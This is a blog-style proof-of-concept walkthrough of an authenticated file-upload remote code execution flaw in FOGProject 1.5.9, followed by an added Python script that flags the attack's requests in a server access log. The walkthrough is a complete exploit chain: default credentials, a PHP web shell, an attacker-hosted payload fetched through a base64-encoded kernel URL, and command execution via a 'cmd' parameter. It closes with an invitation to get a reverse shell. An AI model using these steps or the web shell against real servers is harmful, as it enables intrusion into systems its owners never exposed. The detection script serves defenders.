Hello guys, I will be talking about the new FOGProject 1.5.9 - File Upload RCE (Authenticated), which was disclosed not too long ago, so I will be exploiting one for a proof of concept.
ExploitDB Link:- https://www.exploit-db.com/exploits/49811
We have the victim machine ready. Now let's log in with the FOGProject default credentials, which are fog and password, and we should have access to the dashboard.
Now time for the fun part. Going to the attacking machine, let's create an empty 10 MB file.
dd if=/dev/zero of=myshell bs=10485760 count=1
Now let's add our PHP payload to the end of the file we just created.
echo '<?php $cmd=$_GET["cmd"]; system($cmd); ?>' >> myshell
Now we need to make our myshell file accessible over HTTP. I will be using SimpleHTTPServer for that, or you can simply copy myshell to your /var/www/html.
It is running in the same folder where I have myshell. Now let's base64-encode the URL of the myshell file (replacing Attacker-IP; that is my IP, because we are hosting the myshell file on my machine).
echo "http://Attacker-IP/myshell" | base64
Now let's visit the URL.
http://localhostfog//fog/management/index.php?node=about&sub=kernel&file=aHR0cDovLzEwLjguMC4xNTYvbXlzaGVsbAo=&arch=arm64
NOTE:- The file parameter carries the myshell URL that we encoded in base64, aHR0cDovLzEwLjguMC4xNTYvbXlzaGVsbAo=. The general form is:
http://VICTIM_IP/fog/management/index.php?node=about&sub=kernel&file=<MYSHELL_URL_ENCODED_IN_BASE64_HERE>=&arch=arm64
Now change the Kernel Name (bzImage32) to myshell.php and click on Install. We should get Download Started; give it time and we should see Transfer Succeeded.
Nice, our file has been uploaded. We can confirm it by checking the SimpleHTTPServer we started.
Now let's access our uploaded file through its URL to get remote code execution.
http://localhostfog/fog/service/ipxe/myshell.php?cmd=id
Boom, and we have remote code execution. You can go ahead and get a reverse shell or do anything.
Greetings from Muzec
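
Seen from the FOG server's access log, the two requests in this walkthrough (the kernel download whose file parameter is a base64 URL, and the cmd request under /fog/service/ipxe/) can be flagged as follows. This is an added example, not part of the original post or FOGProject's own code; the combined log format, the allowlist host kernels.example.org, the function names and the sample lines are assumptions constructed for illustration.

```python
import base64
import re
from urllib.parse import parse_qs, urlsplit

# Assumption: hosts this FOG server may legitimately fetch kernels from (placeholder).
TRUSTED_KERNEL_HOSTS = {"kernels.example.org"}
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def decode_file_param(value):
    """Return (url, host) from the base64 'file' parameter, or (None, None)."""
    core = value.replace(" ", "+").rstrip("=")  # parse_qs turns '+' into ' '
    try:
        raw = base64.b64decode(core + "=" * (-len(core) % 4), validate=True)
        url = raw.decode("utf-8").strip()
        return url, urlsplit(url).hostname
    except ValueError:  # covers binascii.Error and UnicodeDecodeError
        return None, None

def check_line(line):
    """Return (client, reason) for a suspicious access-log line, else None."""
    match = REQUEST_RE.match(line)
    if not match:
        return None
    client, target = match.groups()
    path, _, query_string = target.partition("?")
    path = re.sub(r"/+", "/", path)  # tolerate doubled slashes in the path
    query = parse_qs(query_string)
    if path.endswith("/fog/management/index.php") and query.get("sub") == ["kernel"]:
        for value in query.get("file", []):
            url, host = decode_file_param(value)
            if host not in TRUSTED_KERNEL_HOSTS:
                return client, f"kernel source not on allowlist: {url!r}"
    if path.startswith("/fog/service/ipxe/") and path.endswith(".php") and "cmd" in query:
        return client, f"command parameter sent to {path}"
    return None

def b64(url):
    return base64.b64encode(url.encode()).decode()

# Constructed sample lines (combined log format), not taken from a real server.
STAMP = '- - [01/Jan/2024:10:00:00 +0000]'
KERNEL = "/fog/management/index.php?node=about&sub=kernel&arch=arm64&file="
SAMPLE_LOG = [
    f'192.0.2.10 {STAMP} "GET {KERNEL}{b64("https://kernels.example.org/bzImage")} HTTP/1.1" 200 512',
    f'198.51.100.7 {STAMP} "GET /{KERNEL}aHR0cDovLzEwLjguMC4xNTYvbXlzaGVsbAo= HTTP/1.1" 200 512',
    f'198.51.100.7 {STAMP} "GET /fog/service/ipxe/myshell.php?cmd=id HTTP/1.1" 200 64',
    f'192.0.2.10 {STAMP} "GET /fog/management/index.php?node=home HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for entry in SAMPLE_LOG:
        print(check_line(entry))
```

An undecodable file value is flagged as well, since its host can never match the allowlist.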